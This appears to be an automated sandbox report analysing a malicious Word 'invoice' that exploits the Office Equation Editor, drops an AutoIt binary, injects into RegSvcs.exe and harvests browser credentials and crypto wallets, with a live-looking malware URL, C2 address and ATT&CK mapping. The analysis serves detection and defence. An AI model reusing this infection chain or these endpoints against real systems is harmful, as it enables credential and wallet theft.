                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0026418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_0026418A
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00234AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00234AFE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MSASCui.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.2.notorious53209.exe.170000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.notorious53209.exe.170000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: notorious53209.exe PID: 3468, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3536, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                  Source: notorious53209.exeBinary or memory string: WIN_81
                  Source: notorious53209.exeBinary or memory string: WIN_XP
                  Source: notorious53209.exeBinary or memory string: WIN_XPe
                  Source: notorious53209.exeBinary or memory string: WIN_VISTA
                  Source: notorious53209.exeBinary or memory string: WIN_7
                  Source: notorious53209.exeBinary or memory string: WIN_8
                  Source: notorious53209.exe, 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: Yara matchFile source: 10.2.notorious53209.exe.170000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.notorious53209.exe.170000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: notorious53209.exe PID: 3468, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3536, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.2.notorious53209.exe.170000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.notorious53209.exe.170000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: notorious53209.exe PID: 3468, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3536, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002A6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_002A6596
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002A6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_002A6A5A
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts
                  221
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  3
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Native API
                  2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  21
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol21
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts33
                  Exploitation for Client Execution
                  1
                  Windows Service
                  2
                  Valid Accounts
                  21
                  Obfuscated Files or Information
                  Security Account Manager12
                  File and Directory Discovery
                  SMB/Windows Admin Shares21
                  Input Capture
                  11
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  Software Packing
                  NTDS228
                  System Information Discovery
                  Distributed Component Object Model3
                  Clipboard Data
                  3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  Windows Service
                  1
                  DLL Side-Loading
                  LSA Secrets46
                  Security Software Discovery
                  SSHKeylogging114
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts212
                  Process Injection
                  1
                  Masquerading
                  Cached Domain Credentials231
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Valid Accounts
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
                  Virtualization/Sandbox Evasion
                  Proc Filesystem11
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                  Access Token Manipulation
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                  Process Injection
                  Network Sniffing1
                  Remote System Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1461841 Sample: Invoice LGMSCH0040924 Paid ... Startdate: 24/06/2024 Architecture: WINDOWS Score: 100 36 universalmovies.top 2->36 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus detection for URL or domain 2->56 58 17 other signatures 2->58 9 WINWORD.EXE 313 54 2->9         started        signatures3 process4 dnsIp5 42 universalmovies.top 104.21.74.191, 443, 49166, 49170 CLOUDFLARENETUS United States 9->42 44 172.67.162.95, 443, 49167, 49168 CLOUDFLARENETUS United States 9->44 26 C:\Users\user\...\universalmovies.top.url, MS 9->26 dropped 28 C:\Users\user\AppData\...\notorious.doc.url, MS 9->28 dropped 30 ~WRF{CD326501-1350...C-AD93E1795262}.tmp, Composite 9->30 dropped 76 Microsoft Office launches external ms-search protocol handler (WebDAV) 9->76 78 Office viewer loads remote template 9->78 80 Microsoft Office drops suspicious files 9->80 14 EQNEDT32.EXE 11 9->14         started        file6 signatures7 process8 dnsIp9 46 universalmovies.top 14->46 32 C:\Users\user\AppData\...\notorious53209.exe, PE32 14->32 dropped 34 C:\Users\user\AppData\...xtExport2[1].exe, PE32 14->34 dropped 48 Office equation editor establishes network connection 14->48 50 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 14->50 19 notorious53209.exe 4 14->19         started        file10 signatures11 process12 signatures13 60 Multi AV Scanner detection for dropped file 19->60 62 Binary is likely a compiled AutoIt script file 19->62 64 Writes to foreign memory regions 19->64 66 2 other signatures 19->66 22 RegSvcs.exe 13 35 19->22         started        process14 dnsIp15 38 185.38.142.10, 49176, 49178, 49179 NETSOLUTIONSNL Portugal 22->38 40 api.ip.sb 22->40 68 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->68 70 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 22->70 72 Tries to harvest and steal browser information (history, passwords, etc) 22->72 74 Tries to steal Crypto Currency Wallets 22->74 signatures16

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc37%ReversingLabsDocument-Office.Exploit.CVE-2017-0199
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{CD326501-1350-4080-AA2C-AD93E1795262}.tmp100%AviraEXP/CVE-2018-0798.Gen
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\ExtExport2[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\ExtExport2[1].exe50%ReversingLabsWin32.Trojan.Strab
                  C:\Users\user\AppData\Roaming\notorious53209.exe50%ReversingLabsWin32.Trojan.Strab
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://crl.entrust.net/server1.crl00%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://secure.comodo.com/CPS00%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://tempuri.org/0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                  https://support.google.com/chrome/?p=plugin_flash0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  http://ns.adobe.c/s0%Avira URL Cloudsafe
                  https://api.ip.sb/geoip0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                  https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                  https://ipinfo.io/ip%appdata%0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/fault0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                  https://support.google.com/chrome/?p=plugin_flashLR0%Avira URL Cloudsafe
                  185.38.142.10:74740%Avira URL Cloudsafe
                  https://support.LR0%Avira URL Cloudsafe
                  http://185.38.142.10:74740%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                  http://schemas.datacontract.org/2004/07/0%Avira URL Cloudsafe
                  http://tempuri.org/x0%Avira URL Cloudsafe
                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  https://api.ip.sb0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%Avira URL Cloudsafe
                  https://www.google.com/favicon.ico0%Avira URL Cloudsafe
                  http://185.38.142.10:7474/0%Avira URL Cloudsafe
                  https://universalmovies.top/100%Avira URL Cloudphishing
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                  https://universalmovies.top/notorious.doc100%Avira URL Cloudmalware
                  http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                  http://185.38.142.10:7474t-0%Avira URL Cloudsafe
                  https://api.ipify.0%Avira URL Cloudsafe
                  http://ns.adobe.0%Avira URL Cloudsafe
                  https://api.ipify.orgcoo0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/soap/actor/next0%Avira URL Cloudsafe
                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
                  https://universalmovies.top/FB8Rj100%Avira URL Cloudphishing
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  universalmovies.top
                  104.21.74.191
                  truetrue
                    unknown
                    api.ip.sb
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      185.38.142.10:7474true
                      • Avira URL Cloud: safe
                      unknown
                      http://185.38.142.10:7474/true
                      • Avira URL Cloud: safe
                      unknown
                      https://universalmovies.top/notorious.doctrue
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabRegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ns.adobe.c/sRegSvcs.exe, 0000000C.00000002.439977247.0000000004C8D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=RegSvcs.exe, 0000000C.00000002.439295292.000000000230C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmp, tmpD804.tmp.12.dr, tmp9D43.tmp.12.dr, tmp6274.tmp.12.dr, tmp27E3.tmp.12.dr, tmpD7E3.tmp.12.dr, tmp3D9E.tmp.12.dr, tmpB2E0.tmp.12.dr, tmpB2B0.tmp.12.dr, tmp784E.tmp.12.dr, tmpED42.tmp.12.dr, tmp780F.tmp.12.dr, tmpED81.tmp.12.drfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.entrust.net03EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sb/geoipRegSvcs.exe, 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/soap/envelope/RegSvcs.exe, 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://support.google.com/chrome/?p=plugin_flashRegSvcs.exe, 0000000C.00000002.439295292.0000000002131000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/RegSvcs.exe, 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/VerifyUpdateResponseRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/SetEnvironmentRegSvcs.exe, 0000000C.00000002.439295292.0000000002353000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/SetEnvironmentResponseRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/GetUpdatesRegSvcs.exe, 0000000C.00000002.439295292.0000000002493000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ipify.orgcookies//settinString.RemovegRegSvcs.exe, RegSvcs.exe, 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://support.google.com/chrome/?p=plugin_flashLRRegSvcs.exe, 0000000C.00000002.439295292.000000000249D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/VerifyUpdateRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://support.LRRegSvcs.exe, 0000000C.00000002.439295292.000000000249D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002566000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.entrust.net0DEQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ipinfo.io/ip%appdata%RegSvcs.exe, RegSvcs.exe, 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://185.38.142.10:7474RegSvcs.exe, 0000000C.00000002.439295292.0000000002493000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.0000000002353000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000009.00000003.391274570.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391505550.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.391551132.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.391282505.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.439171465.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/CheckConnectResponseRegSvcs.exe, 0000000C.00000002.439295292.00000000020A1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.datacontract.org/2004/07/RegSvcs.exe, 0000000C.00000002.439295292.0000000002353000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/xRegSvcs.exe, 0000000C.00000002.439295292.0000000002493000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%RegSvcs.exe, RegSvcs.exe, 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sbRegSvcs.exe, 0000000C.00000002.439295292.00000000020F0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
